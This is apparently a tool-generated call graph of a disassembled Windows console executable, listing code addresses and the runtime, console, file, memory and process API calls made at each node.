401218 GetStdHandle GetModuleFileNameA 6583 40125a 6582->6583 6584 401448 GetTempPathA 6583->6584 6585 401472 6584->6585 6775 40563f 6585->6775 6587 4014e4 6780 4055a9 6587->6780 6589 4015ab 6590 40563f 13 API calls 6589->6590 6591 4015ee 6590->6591 6592 4055a9 52 API calls 6591->6592 6593 4016b5 6592->6593 6594 40563f 13 API calls 6593->6594 6595 4016d3 6594->6595 6596 4055a9 52 API calls 6595->6596 6597 4016e2 6596->6597 6790 403217 6597->6790 6599 4016f1 6600 40563f 13 API calls 6599->6600 6601 40170e 6600->6601 6602 403217 16 API calls 6601->6602 6603 401743 6602->6603 6604 40563f 13 API calls 6603->6604 6605 401758 6604->6605 6606 40563f 13 API calls 6605->6606 6607 40177b 6606->6607 6608 40563f 13 API calls 6607->6608 6609 4019bd 6608->6609 6610 40563f 13 API calls 6609->6610 6611 4019dd 6610->6611 6612 40563f 13 API calls 6611->6612 6613 401b5f 6612->6613 6614 40563f 13 API calls 6613->6614 6615 401ba4 6614->6615 6616 40563f 13 API calls 6615->6616 6617 401be1 6616->6617 6618 40563f 13 API calls 6617->6618 6619 401e35 6618->6619 6796 401ef5 6619->6796 6621 401e3d 6622 4055a9 52 API calls 6621->6622 6623 401e47 6622->6623 6625 4055a9 52 API calls 6623->6625 6627 401ea0 6623->6627 6624 401eeb 6634 405db9 6624->6634 6625->6623 6626 4055a9 52 API calls 6626->6627 6627->6624 6627->6626 6629 406551 6628->6629 6630 406556 6628->6630 6632 408b48 7 API calls 6629->6632 6631 408b81 7 API calls 6630->6631 6633 40655f ExitProcess 6631->6633 6632->6630 6635 405ddb 3 API calls 6634->6635 6636 405dc6 6635->6636 6637 408380 6636->6637 6638 40838c 6637->6638 6639 4084b5 UnhandledExceptionFilter 6638->6639 6640 406515 6638->6640 6639->6640 6642 408961 6641->6642 6642->6518 6642->6519 6652 408dba 6643->6652 6646 406523 6647 406531 6646->6647 6648 40652c 6646->6648 6687 408b81 6647->6687 6681 408b48 6648->6681 6653 4075cd 6652->6653 6655 408dc1 6652->6655 6653->6523 6653->6646 6655->6653 6656 408de6 6655->6656 6657 408df3 6656->6657 6658 408df9 6656->6658 6662 409ba9 6657->6662 6660 408e05 RtlAllocateHeap 6658->6660 6661 408e1a 6658->6661 6660->6661 6661->6655 6667 409bdb 6662->6667 6663 409c83 6677 409f63 6663->6677 6665 409c97 6665->6658 6667->6663 6667->6665 6670 409eb2 6667->6670 6671 409ef5 HeapAlloc 6670->6671 6672 409ec5 HeapReAlloc 6670->6672 6674 409c7a 6671->6674 6675 409f1b VirtualAlloc 6671->6675 6673 409ee4 6672->6673 6672->6674 6673->6671 6674->6663 6674->6665 6675->6674 6676 409f35 HeapFree 6675->6676 6676->6674 6678 409f75 VirtualAlloc 6677->6678 6680 409c89 6678->6680 6680->6665 6683 408b52 6681->6683 6682 408b7f 6682->6647 6683->6682 6684 408b81 7 API calls 6683->6684 6685 408b69 6684->6685 6686 408b81 7 API calls 6685->6686 6686->6682 6688 408b94 6687->6688 6689 408cab 6688->6689 6690 408bd4 6688->6690 6695 40653a 6688->6695 6691 408cbe GetStdHandle WriteFile 6689->6691 6692 408be0 GetModuleFileNameA 6690->6692 6690->6695 6691->6695 6693 408bf8 6692->6693 6696 40b641 6693->6696 6695->6523 6697 40b64e LoadLibraryA 6696->6697 6698 40b690 6696->6698 6697->6698 6699 40b65f GetProcAddress 6697->6699 6698->6695 6699->6698 6700 40b676 GetProcAddress GetProcAddress 6699->6700 6700->6698 6702 407311 6701->6702 6703 407335 6701->6703 6704 407327 HeapFree 6702->6704 6705 40731d 6702->6705 6703->6553 6704->6703 6708 40987e 6705->6708 6707 407323 6707->6553 6709 4098c5 6708->6709 6710 409ab7 VirtualFree 6709->6710 6713 409b71 6709->6713 6711 409b1b 6710->6711 6712 409b2a VirtualFree HeapFree 6711->6712 6711->6713 6712->6713 6713->6707 6715 40b62e 6714->6715 6717 40b635 6714->6717 6718 40b261 6715->6718 6717->6558 6725 40b3fa 6718->6725 6722 40b2a4 GetCPInfo 6724 40b2b8 6722->6724 6723 40b3ee 6723->6717 6724->6723 6730 40b4a0 GetCPInfo 6724->6730 6726 40b41a 6725->6726 6727 40b40a GetOEMCP 6725->6727 6728 40b272 6726->6728 6729 40b41f GetACP 6726->6729 6727->6726 6728->6722 6728->6723 6728->6724 6729->6728 6731 40b58b 6730->6731 6734 40b4c3 6730->6734 6731->6723 6738 40a643 6734->6738 6737 40be20 9 API calls 6737->6731 6739 40a68c 6738->6739 6740 40a674 GetStringTypeW 6738->6740 6741 40a6b7 GetStringTypeA 6739->6741 6742 40a6db 6739->6742 6740->6739 6743 40a690 GetStringTypeA 6740->6743 6745 40a778 6741->6745 6742->6745 6746 40a6f1 MultiByteToWideChar 6742->6746 6743->6739 6743->6745 6750 40be20 6745->6750 6746->6745 6747 40a715 6746->6747 6747->6745 6748 40a74f MultiByteToWideChar 6747->6748 6748->6745 6749 40a768 GetStringTypeW 6748->6749 6749->6745 6751 40be50 LCMapStringW 6750->6751 6752 40be6c 6750->6752 6751->6752 6753 40be74 LCMapStringA 6751->6753 6755 40bed2 6752->6755 6756 40beb5 LCMapStringA 6752->6756 6753->6752 6754 40b563 6753->6754 6754->6737 6755->6754 6757 40bee8 MultiByteToWideChar 6755->6757 6756->6754 6757->6754 6758 40bf12 6757->6758 6758->6754 6759 40bf48 MultiByteToWideChar 6758->6759 6759->6754 6760 40bf61 LCMapStringW 6759->6760 6760->6754 6761 40bf7c 6760->6761 6762 40bfc2 6761->6762 6763 40bf82 6761->6763 6762->6754 6765 40bffa LCMapStringW 6762->6765 6763->6754 6764 40bf90 LCMapStringW 6763->6764 6764->6754 6765->6754 6766 40c012 WideCharToMultiByte 6765->6766 6766->6754 6769 404d7a 6768->6769 6770 405528 timeGetTime 6769->6770 6771 405537 6770->6771 6772 405571 Sleep 6771->6772 6773 40558f timeGetTime 6772->6773 6774 40559e 6773->6774 6774->6582 6948 40692a 6775->6948 6778 405677 6778->6587 6987 4068ad 6780->6987 6783 4055c7 6785 4055cb 6783->6785 7012 406869 GetFileAttributesA 6783->7012 6784 4055df 6786 4055fc 6784->6786 6993 4066cf 6784->6993 6785->6589 6786->6785 7015 40656c 6786->7015 6791 40322a 6790->6791 7160 4036d1 timeGetTime 6791->7160 6793 403237 7165 4035ee 6793->7165 6795 40324b 6795->6599 6797 4020e8 6796->6797 6798 40563f 13 API calls 6797->6798 6799 402106 6798->6799 7168 403559 GetModuleFileNameA 6799->7168 6801 402115 7169 405edf 6801->7169 6804 402149 7172 405d00 6804->7172 6809 405db9 3 API calls 6809->6804 6814 405d00 6 API calls 6815 4021a2 6814->6815 7194 405ac6 6815->7194 6817 4021ba 7198 4032a3 6817->7198 6819 4021d9 6820 405d00 6 API calls 6819->6820 6821 40220a 6820->6821 6822 405ac6 12 API calls 6821->6822 6823 402222 6822->6823 6824 4032a3 6 API calls 6823->6824 6825 402241 6824->6825 6826 405ac6 12 API calls 6825->6826 6829 40225e 6826->6829 6828 402396 6830 4023c8 6828->6830 7222 403a1c 6828->7222 7203 403849 6829->7203 6831 405b1d 6 API calls 6830->6831 6833 4023dc 6831->6833 6834 405ac6 12 API calls 6833->6834 6835 4023fa 6834->6835 6836 405ac6 12 API calls 6835->6836 6837 402436 6836->6837 6838 402fb6 6837->6838 6840 405d00 6 API calls 6837->6840 6839 405882 13 API calls 6838->6839 6841 402fca 6839->6841 6842 4024b9 6840->6842 6841->6621 6843 405ac6 12 API calls 6842->6843 6844 4024d1 6843->6844 6845 4032a3 6 API calls 6844->6845 6846 4024f0 6845->6846 6847 405ac6 12 API calls 6846->6847 6848 40250e 6847->6848 6849 4032a3 6 API calls 6848->6849 6850 40252d 6849->6850 6852 402557 6850->6852 7276 4059ed 6850->7276 6853 405d00 6 API calls 6852->6853 6854 40260e 6853->6854 6855 405ac6 12 API calls 6854->6855 6856 40262e 6855->6856 6856->6838 6864 402b5b 6856->6864 6865 4027ce 6856->6865 7282 404caa SetConsoleCursorPosition SetConsoleCursorInfo 6856->7282 6858 4026ea 6859 405e8e 13 API calls 6858->6859 6860 4026f7 6859->6860 6861 405e8e 13 API calls 6860->6861 6862 402706 6861->6862 6863 4035ee 13 API calls 6862->6863 6866 40272c 6863->6866 6869 402d93 6864->6869 6872 40563f 13 API calls 6864->6872 6867 40563f 13 API calls 6865->6867 6868 405e8e 13 API calls 6866->6868 6870 402826 6867->6870 6871 402735 6868->6871 6869->6838 6878 40563f 13 API calls 6869->6878 6873 4055a9 52 API calls 6870->6873 6874 405e8e 13 API calls 6871->6874 6875 402bdc 6872->6875 6876 402835 6873->6876 6877 402742 6874->6877 6879 4055a9 52 API calls 6875->6879 6885 405edf 26 API calls 6876->6885 6880 405e8e 13 API calls 6877->6880 6881 402e14 6878->6881 6882 402beb 6879->6882 6883 40274f 6880->6883 6884 4055a9 52 API calls 6881->6884 6889 405edf 26 API calls 6882->6889 6886 4035ee 13 API calls 6883->6886 6887 402e23 6884->6887 6896 40286b 6885->6896 6888 402772 6886->6888 6891 405edf 26 API calls 6887->6891 6890 405e8e 13 API calls 6888->6890 6892 402c20 6889->6892 6893 40277b 6890->6893 6895 402e58 6891->6895 6892->6869 7207 40583f 6892->7207 6894 405e8e 13 API calls 6893->6894 6898 402788 6894->6898 6895->6838 6906 402faa 6895->6906 6907 402eae 6895->6907 6896->6864 6897 402b3d 6896->6897 6903 4059ed 12 API calls 6896->6903 6909 4028e2 6896->6909 7286 405882 6897->7286 6901 4035ee 13 API calls 6898->6901 6905 4027ab 6901->6905 6903->6909 6911 405e8e 13 API calls 6905->6911 6910 405882 13 API calls 6906->6910 6912 402ecf 6907->6912 6917 4059ed 12 API calls 6907->6917 6908 4055a9 52 API calls 6908->6864 6915 402964 6909->6915 6919 4058d8 12 API calls 6909->6919 6910->6838 6916 4027b4 6911->6916 6925 402f52 6912->6925 6928 4058d8 12 API calls 6912->6928 6913 402d87 6918 405882 13 API calls 6913->6918 6914 402c8a 6920 4059ed 12 API calls 6914->6920 6923 402cab 6914->6923 6915->6897 7283 404caa SetConsoleCursorPosition SetConsoleCursorInfo 6915->7283 6921 405e8e 13 API calls 6916->6921 6917->6912 6918->6869 6919->6915 6920->6923 6922 4027c1 6921->6922 6924 405e8e 13 API calls 6922->6924 6927 402d2e 6923->6927 6930 4058d8 12 API calls 6923->6930 6924->6865 6925->6621 6927->6621 6928->6925 6929 402a08 6931 405e8e 13 API calls 6929->6931 6930->6927 6932 402a15 6931->6932 7284 404caa SetConsoleCursorPosition SetConsoleCursorInfo 6932->7284 6934 402a72 6935 405e8e 13 API calls 6934->6935 6936 402a7f 6935->6936 6937 4035ee 13 API calls 6936->6937 6938 402aa9 6937->6938 6939 405e8e 13 API calls 6938->6939 6940 402ab2 6939->6940 6941 405e8e 13 API calls 6940->6941 6942 402abf 6941->6942 7285 404caa SetConsoleCursorPosition SetConsoleCursorInfo 6942->7285 6944 402ad3 6945 405e8e 13 API calls 6944->6945 6946 402ae0 6945->6946 6946->6897 6947 405e8e 13 API calls 6946->6947 6947->6946 6949 40566d 6948->6949 6951 40694f __aulldiv __aullrem 6948->6951 6949->6778 6955 4058d8 6949->6955 6950 40706b 12 API calls 6950->6951 6951->6949 6951->6950 6952 4070d1 12 API calls 6951->6952 6953 4070a0 12 API calls 6951->6953 6954 409386 WideCharToMultiByte 6951->6954 6952->6951 6953->6951 6954->6951 6956 405972 6955->6956 6957 4058ee 6955->6957 6956->6778 6957->6956 6964 405949 6957->6964 6979 407914 6957->6979 6958 405953 6961 40596a 6958->6961 6965 40597a 6958->6965 6959 4059b7 6960 407767 6 API calls 6959->6960 6960->6956 6967 407767 6961->6967 6964->6958 6964->6959 6965->6956 6982 407522 6965->6982 6969 407782 6967->6969 6973 4077b1 6967->6973 6968 4077c5 6971 407897 WriteFile 6968->6971 6975 4077d6 6968->6975 6969->6968 6970 407522 2 API calls 6969->6970 6969->6973 6970->6968 6972 4078b9 GetLastError 6971->6972 6971->6973 6972->6973 6973->6956 6974 407822 WriteFile 6976 407849 6974->6976 6977 40788c GetLastError 6974->6977 6975->6973 6975->6974 6976->6975 6978 40785e 6976->6978 6977->6978 6978->6973 6980 408da8 6 API calls 6979->6980 6981 407924 6980->6981 6981->6964 6983 407531 6982->6983 6986 40755a 6982->6986 6984 407566 SetFilePointer 6983->6984 6983->6986 6985 40757e GetLastError 6984->6985 6984->6986 6985->6986 6986->6956 6988 4068bf 6987->6988 6992 4055ba 6987->6992 6990 4068d0 6988->6990 6988->6992 7031 409318 6988->7031 6990->6992 7026 4092d9 6990->7026 6992->6783 6992->6784 6997 4066e4 6993->6997 6994 406783 6999 408da8 6 API calls 6994->6999 6995 406756 6996 406869 2 API calls 6995->6996 6998 40675e 6996->6998 7000 408da8 6 API calls 6997->7000 7004 406718 6997->7004 7011 406778 6998->7011 7108 406818 6998->7108 7005 406792 6999->7005 7000->7004 7001 40679d 7001->6786 7003 407308 4 API calls 7003->7001 7004->6994 7004->6995 7004->7001 7005->7001 7006 406869 2 API calls 7005->7006 7007 4067e2 7005->7007 7008 4067e0 7005->7008 7006->7005 7009 406818 29 API calls 7007->7009 7010 407308 4 API calls 7008->7010 7009->7008 7010->7011 7011->7001 7011->7003 7013 406878 GetLastError 7012->7013 7014 406884 7012->7014 7013->7014 7014->6785 7016 4066cf 31 API calls 7015->7016 7018 406584 7016->7018 7017 4066c6 7017->6785 7018->7017 7019 4068ad 31 API calls 7018->7019 7020 4065be 7019->7020 7020->7017 7021 408da8 6 API calls 7020->7021 7024 4065d3 7021->7024 7022 4066c0 7023 407308 4 API calls 7022->7023 7023->7017 7024->7017 7024->7022 7025 4066cf 31 API calls 7024->7025 7025->7024 7027 4092e2 7026->7027 7028 4092e6 7026->7028 7027->6990 7038 40b7ec 7028->7038 7032 409379 7031->7032 7033 40932b 7031->7033 7032->6990 7033->7032 7034 409331 WideCharToMultiByte 7033->7034 7035 408da8 6 API calls 7033->7035 7036 409352 WideCharToMultiByte 7033->7036 7054 40ba94 7033->7054 7034->7032 7034->7033 7035->7033 7036->7032 7036->7033 7039 40b81f CompareStringW 7038->7039 7041 40b834 7038->7041 7040 40b83c CompareStringA 7039->7040 7039->7041 7040->7041 7045 409305 7040->7045 7042 40b895 CompareStringA 7041->7042 7043 40b8b0 7041->7043 7042->7045 7044 40b96a MultiByteToWideChar 7043->7044 7043->7045 7046 40b8ef GetCPInfo 7043->7046 7044->7045 7048 40b986 7044->7048 7045->6990 7046->7045 7047 40b904 7046->7047 7047->7044 7047->7045 7048->7045 7049 40b9c2 MultiByteToWideChar 7048->7049 7049->7045 7050 40b9dc MultiByteToWideChar 7049->7050 7050->7045 7051 40b9f4 7050->7051 7051->7045 7052 40ba28 MultiByteToWideChar 7051->7052 7052->7045 7053 40ba3f CompareStringW 7052->7053 7053->7045 7055 40baf8 7054->7055 7056 40baa3 7054->7056 7055->7033 7056->7055 7057 40bad8 7056->7057 7079 40bc73 7056->7079 7059 40bb00 7057->7059 7061 40baef 7057->7061 7073 40baf4 7057->7073 7059->7055 7063 408da8 6 API calls 7059->7063 7064 409318 30 API calls 7061->7064 7068 40bb0f 7063->7068 7064->7073 7065 40bb58 7067 407308 4 API calls 7065->7067 7072 40bb86 7065->7072 7066 40bb96 7066->7055 7069 40c949 12 API calls 7066->7069 7070 40bb67 7067->7070 7068->7055 7071 408da8 6 API calls 7068->7071 7068->7073 7069->7072 7092 40c949 7070->7092 7071->7073 7072->7055 7075 408da8 6 API calls 7072->7075 7073->7055 7088 40bc1b 7073->7088 7076 40bbde 7075->7076 7076->7055 7077 40bbef SetEnvironmentVariableA 7076->7077 7078 407308 4 API calls 7077->7078 7078->7055 7080 40bc82 7079->7080 7081 40bc7e 7079->7081 7082 408da8 6 API calls 7080->7082 7081->7057 7083 40bca4 7082->7083 7084 406523 7 API calls 7083->7084 7085 40bcb4 7083->7085 7084->7085 7086 40bcd0 7085->7086 7104 40ca69 7085->7104 7086->7057 7089 40bc29 7088->7089 7091 40bb4b 7088->7091 7090 4092d9 9 API calls 7089->7090 7089->7091 7090->7089 7091->7065 7091->7066 7093 40c964 7092->7093 7094 40c955 7092->7094 7096 40c96c 7093->7096 7103 40c97a 7093->7103 7095 408da8 6 API calls 7094->7095 7098 40c95e 7095->7098 7097 407308 4 API calls 7096->7097 7097->7098 7098->7072 7099 40ca29 HeapReAlloc 7099->7103 7100 40c9e9 HeapAlloc 7100->7103 7101 409ba9 5 API calls 7101->7103 7102 40987e VirtualFree VirtualFree HeapFree 7102->7103 7103->7098 7103->7099 7103->7100 7103->7101 7103->7102 7105 40ca72 7104->7105 7107 40ca7f 7104->7107 7106 408da8 6 API calls 7105->7106 7106->7107 7107->7085 7118 40906e 7108->7118 7110 406839 7110->7011 7111 406831 7111->7110 7132 408e8f 7111->7132 7113 40684f 7114 407308 4 API calls 7113->7114 7115 406859 7114->7115 7116 407308 4 API calls 7115->7116 7117 406861 7116->7117 7117->7011 7119 40907c 7118->7119 7120 408da8 6 API calls 7119->7120 7121 409098 7120->7121 7122 40880a 18 API calls 7121->7122 7124 4090ca 7121->7124 7130 4090a2 7121->7130 7131 4090ff 7121->7131 7122->7131 7123 4091d3 7123->7111 7124->7123 7126 407308 4 API calls 7124->7126 7125 408da8 6 API calls 7127 409173 7125->7127 7126->7130 7127->7124 7128 409181 7127->7128 7129 407308 4 API calls 7128->7129 7129->7130 7130->7111 7131->7125 7131->7130 7134 408ea8 7132->7134 7133 408edf 7133->7113 7134->7133 7147 40a56e 7134->7147 7137 407308 4 API calls 7138 409004 7137->7138 7138->7133 7140 409021 7138->7140 7152 405dca 7138->7152 7139 408f46 CreateProcessA GetLastError 7139->7137 7142 40904b 7140->7142 7143 40902c WaitForSingleObject GetExitCodeProcess CloseHandle 7140->7143 7144 409051 CloseHandle 7142->7144 7145 40905b 7142->7145 7146 409061 CloseHandle 7143->7146 7144->7146 7145->7146 7146->7133 7149 40a581 7147->7149 7148 40a5d5 7148->7139 7149->7148 7150 40a5aa HeapAlloc 7149->7150 7151 409ba9 5 API calls 7149->7151 7150->7148 7150->7149 7151->7149 7155 405ddb 7152->7155 7156 405de7 GetCurrentProcess TerminateProcess 7155->7156 7157 405df8 7155->7157 7156->7157 7158 405dd7 7157->7158 7159 405e62 ExitProcess 7157->7159 7158->7140 7161 4036f1 7160->7161 7162 40372b Sleep 7161->7162 7163 403749 timeGetTime 7162->7163 7164 403758 7163->7164 7164->6793 7166 40563f 13 API calls 7165->7166 7167 403620 7166->7167 7167->6795 7168->6801 7296 405ebf 7169->7296 7171 40211e 7171->6804 7215 405e8e 7171->7215 7173 402159 7172->7173 7174 405d0d 7172->7174 7180 405ba8 7173->7180 7174->7173 7175 405d2f 7174->7175 7177 405ba8 2 API calls 7174->7177 7376 407450 7175->7376 7177->7175 7179 407522 2 API calls 7179->7173 7181 405bc1 7180->7181 7182 407522 2 API calls 7181->7182 7184 405bcd 7182->7184 7183 402168 7188 405b1d 7183->7188 7184->7183 7185 407522 2 API calls 7184->7185 7186 405c8f 7185->7186 7186->7183 7187 407522 2 API calls 7186->7187 7187->7183 7190 405b25 7188->7190 7191 405b53 7190->7191 7380 407c2d 7190->7380 7192 407c2d 6 API calls 7191->7192 7193 402177 7191->7193 7192->7191 7193->6814 7195 405ad6 7194->7195 7197 405ada 7194->7197 7195->6817 7196 4059ed 12 API calls 7196->7197 7197->7195 7197->7196 7199 4032f3 7198->7199 7200 405b1d 6 API calls 7199->7200 7202 40330e 7199->7202 7201 40354b 7200->7201 7201->6819 7202->6819 7204 40386c 7203->7204 7205 40563f 13 API calls 7204->7205 7206 4038f4 7205->7206 7206->6828 7208 40584d 7207->7208 7384 407134 7208->7384 7214 402c47 7214->6913 7214->6914 7216 407134 6 API calls 7215->7216 7217 405e9c 7216->7217 7218 40692a 13 API calls 7217->7218 7219 405ead 7218->7219 7220 4071c1 6 API calls 7219->7220 7221 40213f 7220->7221 7221->6809 7223 403a29 7222->7223 7224 4055a9 52 API calls 7223->7224 7272 40441e 7223->7272 7227 404012 7224->7227 7225 4055a9 52 API calls 7226 404478 7225->7226 7228 4044cd 7226->7228 7417 404a16 7226->7417 7401 404caa SetConsoleCursorPosition SetConsoleCursorInfo 7227->7401 7475 404caa SetConsoleCursorPosition SetConsoleCursorInfo 7228->7475 7231 404492 7470 404d05 GetTickCount 7231->7470 7233 4044de 7233->6830 7235 40407d 7239 405e8e 13 API calls 7235->7239 7237 4055a9 52 API calls 7238 4044ae 7237->7238 7474 404caa SetConsoleCursorPosition SetConsoleCursorInfo 7238->7474 7240 40409b 7239->7240 7402 404caa SetConsoleCursorPosition SetConsoleCursorInfo 7240->7402 7243 4044c3 7245 405db9 3 API calls 7243->7245 7244 4040c1 7246 405e8e 13 API calls 7244->7246 7245->7228 7255 4040df 7246->7255 7247 4041a1 7403 404caa SetConsoleCursorPosition SetConsoleCursorInfo 7247->7403 7249 404caa SetConsoleCursorPosition SetConsoleCursorInfo 7249->7255 7250 4041c2 7251 405e8e 13 API calls 7250->7251 7252 4041e0 7251->7252 7404 404caa SetConsoleCursorPosition SetConsoleCursorInfo 7252->7404 7254 40420b 7256 405e8e 13 API calls 7254->7256 7255->7247 7255->7249 7257 405e8e 13 API calls 7255->7257 7268 404229 7256->7268 7257->7255 7258 4042e9 7405 404caa SetConsoleCursorPosition SetConsoleCursorInfo 7258->7405 7260 4042fb 7261 405e8e 13 API calls 7260->7261 7262 40430a 7261->7262 7406 404caa SetConsoleCursorPosition SetConsoleCursorInfo 7262->7406 7264 405e8e 13 API calls 7264->7268 7265 40431f 7266 405e8e 13 API calls 7265->7266 7274 40432c 7266->7274 7267 404caa SetConsoleCursorPosition SetConsoleCursorInfo 7267->7268 7268->7258 7268->7264 7268->7267 7269 404412 7270 403849 13 API calls 7269->7270 7270->7272 7272->7225 7273 405e8e 13 API calls 7273->7274 7274->7269 7274->7273 7275 40cdb6 WriteConsoleA CreateFileA 7274->7275 7407 40cdfa 7274->7407 7275->7274 7277 4059fd 7276->7277 7281 405a09 7276->7281 7278 407914 6 API calls 7277->7278 7279 405a24 7277->7279 7277->7281 7278->7279 7280 407a37 6 API calls 7279->7280 7280->7281 7281->6852 7282->6858 7283->6929 7284->6934 7285->6944 7287 402b4e 7286->7287 7288 405897 7286->7288 7287->6908 7288->7287 7289 407450 6 API calls 7288->7289 7290 4058a1 7289->7290 7493 4073ea 7290->7493 7293 407337 3 API calls 7294 4058b1 7293->7294 7294->7287 7295 407308 4 API calls 7294->7295 7295->7287 7302 407e54 7296->7302 7298 405ec8 7298->7171 7303 407e68 7302->7303 7305 405ec4 7302->7305 7304 408da8 6 API calls 7303->7304 7303->7305 7304->7305 7305->7298 7306 407ce4 7305->7306 7309 407d03 7306->7309 7307 405edb 7307->7171 7309->7307 7310 40a78c 7309->7310 7311 40a7a9 7310->7311 7320 40a7e8 7311->7320 7331 40a354 7311->7331 7314 40a925 CreateFileA 7315 40a944 GetFileType 7314->7315 7316 40a956 GetLastError 7314->7316 7317 40a96a 7315->7317 7318 40a94f CloseHandle 7315->7318 7316->7320 7335 40a3e9 7317->7335 7318->7316 7320->7307 7322 407522 2 API calls 7323 40a9c3 7322->7323 7324 40a9ce 7323->7324 7346 407a37 7323->7346 7324->7320 7339 407337 7324->7339 7326 40a9ec 7328 40aa02 7326->7328 7356 40bcda 7326->7356 7328->7324 7329 407522 2 API calls 7328->7329 7329->7324 7333 40a363 7331->7333 7332 408da8 6 API calls 7334 40a39e 7332->7334 7333->7332 7333->7334 7334->7314 7334->7320 7336 40a43f 7335->7336 7338 40a3f7 7335->7338 7336->7320 7336->7322 7337 40a439 SetStdHandle 7337->7336 7338->7336 7338->7337 7340 40734b 7339->7340 7345 4073b8 7339->7345 7341 4073b0 7340->7341 7343 40739a FindCloseChangeNotification 7340->7343 7340->7345 7372 40a460 7341->7372 7343->7341 7344 4073a6 GetLastError 7343->7344 7344->7341 7345->7320 7347 407a4f 7346->7347 7350 407ad2 7346->7350 7348 407aac ReadFile 7347->7348 7347->7350 7349 407ac5 GetLastError 7348->7349 7352 407aff 7348->7352 7349->7350 7350->7326 7351 407b78 ReadFile 7353 407b96 GetLastError 7351->7353 7354 407ba0 7351->7354 7352->7350 7352->7351 7353->7354 7354->7352 7355 407522 2 API calls 7354->7355 7355->7354 7357 40bce7 7356->7357 7358 407522 2 API calls 7357->7358 7366 40be07 7357->7366 7359 40bd1f 7358->7359 7360 407522 2 API calls 7359->7360 7359->7366 7361 40bd37 7360->7361 7362 40bdbc 7361->7362 7363 40bd4d 7361->7363 7361->7366 7364 407522 2 API calls 7362->7364 7371 40bd99 7362->7371 7370 407767 6 API calls 7363->7370 7363->7371 7367 40bdc9 7364->7367 7365 407522 2 API calls 7365->7366 7366->7328 7368 40bdcf SetEndOfFile 7367->7368 7369 40bde7 GetLastError 7368->7369 7368->7371 7369->7371 7370->7363 7371->7365 7373 40a4b9 7372->7373 7374 40a46e 7372->7374 7373->7345 7374->7373 7375 40a4b3 SetStdHandle 7374->7375 7375->7373 7377 407466 7376->7377 7379 405d3c 7376->7379 7378 407767 6 API calls 7377->7378 7377->7379 7378->7379 7379->7179 7381 407c4b 7380->7381 7383 407c3f 7380->7383 7382 40a643 6 API calls 7381->7382 7382->7383 7383->7190 7385 407141 7384->7385 7386 408da8 6 API calls 7385->7386 7387 405857 7385->7387 7386->7387 7388 4071fe 7387->7388 7389 405867 7388->7389 7390 407222 7388->7390 7394 4071c1 7389->7394 7390->7389 7391 4058d8 12 API calls 7390->7391 7392 407450 6 API calls 7390->7392 7393 407767 6 API calls 7390->7393 7391->7390 7392->7390 7393->7390 7395 4071c9 7394->7395 7396 4071eb 7394->7396 7397 407450 6 API calls 7395->7397 7400 4071fb 7395->7400 7398 407450 6 API calls 7396->7398 7396->7400 7399 4071d9 7397->7399 7398->7400 7399->7214 7400->7214 7401->7235 7402->7244 7403->7250 7404->7254 7405->7260 7406->7265 7408 40ce17 7407->7408 7409 40ce0c 7407->7409 7410 40ce20 7408->7410 7411 40ce2e GetConsoleMode SetConsoleMode 7408->7411 7476 40cf8b CreateFileA 7408->7476 7409->7274 7410->7274 7412 40ce67 ReadConsoleInputA 7411->7412 7414 40cea8 7412->7414 7416 40ce6d 7412->7416 7415 40ceb9 SetConsoleMode 7414->7415 7415->7274 7416->7412 7416->7414 7416->7415 7477 404cea SetConsoleTextAttribute 7417->7477 7419 404a30 7478 404caa SetConsoleCursorPosition SetConsoleCursorInfo 7419->7478 7421 404a44 7422 405e8e 13 API calls 7421->7422 7423 404a6a 7422->7423 7424 404d05 3 API calls 7423->7424 7425 404a76 7424->7425 7479 404cea SetConsoleTextAttribute 7425->7479 7427 404a86 7480 404caa SetConsoleCursorPosition SetConsoleCursorInfo 7427->7480 7429 404a9a 7430 405e8e 13 API calls 7429->7430 7431 404ac0 7430->7431 7432 404c49 7431->7432 7433 404aec 7431->7433 7489 404cea SetConsoleTextAttribute 7432->7489 7481 404caa SetConsoleCursorPosition SetConsoleCursorInfo 7433->7481 7436 404b02 7482 404cea SetConsoleTextAttribute 7436->7482 7437 404c56 7490 404caa SetConsoleCursorPosition SetConsoleCursorInfo 7437->7490 7440 404c74 7441 405e8e 13 API calls 7440->7441 7442 404c81 7441->7442 7491 404cea SetConsoleTextAttribute 7442->7491 7444 404c91 7492 404caa SetConsoleCursorPosition SetConsoleCursorInfo 7444->7492 7445 404b12 7447 405e8e 13 API calls 7445->7447 7449 404b3b 7447->7449 7448 404ca3 7448->7231 7483 404caa SetConsoleCursorPosition SetConsoleCursorInfo 7449->7483 7451 404b56 7484 404cea SetConsoleTextAttribute 7451->7484 7453 404b66 7454 405e8e 13 API calls 7453->7454 7455 404b8f 7454->7455 7456 404d05 3 API calls 7455->7456 7457 404b9b 7456->7457 7485 404caa SetConsoleCursorPosition SetConsoleCursorInfo 7457->7485 7459 404bb4 7486 404cea SetConsoleTextAttribute 7459->7486 7461 404bc4 7462 405e8e 13 API calls 7461->7462 7463 404bed 7462->7463 7487 404caa SetConsoleCursorPosition SetConsoleCursorInfo 7463->7487 7465 404c08 7488 404cea SetConsoleTextAttribute 7465->7488 7467 404c18 7468 405e8e 13 API calls 7467->7468 7469 404c41 7468->7469 7469->7231 7471 404d19 GetTickCount 7470->7471 7472 40449f 7471->7472 7473 404d29 Sleep 7471->7473 7472->7237 7473->7471 7474->7243 7475->7233 7476->7411 7477->7419 7478->7421 7479->7427 7480->7429 7481->7436 7482->7445 7483->7451 7484->7453 7485->7459 7486->7461 7487->7465 7488->7467 7489->7437 7490->7440 7491->7444 7492->7448 7494 4058a9 7493->7494 7495 4073f6 7493->7495 7494->7293 7495->7494 7496 407308 4 API calls 7495->7496 7496->7494 7922 402e84 7923 402e93 7922->7923 7924 402faa 7923->7924 7925 402eae 7923->7925 7926 405882 13 API calls 7924->7926 7927 402ecf 7925->7927 7928 4059ed 12 API calls 7925->7928 7929 402fb6 7926->7929 7930 402f52 7927->7930 7932 4058d8 12 API calls 7927->7932 7928->7927 7931 405882 13 API calls 7929->7931 7933 402fca 7931->7933 7932->7930 7502 407f45 7507 40abab 7502->7507 7504 407f85 7505 407c2d 6 API calls 7506 407f53 7505->7506 7506->7504 7506->7505 7508 40abd8 7507->7508 7512 40abbb 7507->7512 7509 40abf6 7508->7509 7510 407c2d 6 API calls 7508->7510 7511 40be20 9 API calls 7509->7511 7509->7512 7510->7509 7511->7512 7512->7506 7934 408005 7935 408013 7934->7935 7936 40802e 7934->7936 7941 40b008 7935->7941 7944 40b035 7936->7944 7939 408037 7940 40801c 7947 40c1e5 7941->7947 7943 40b024 7943->7940 7945 40c1e5 6 API calls 7944->7945 7946 40b051 7945->7946 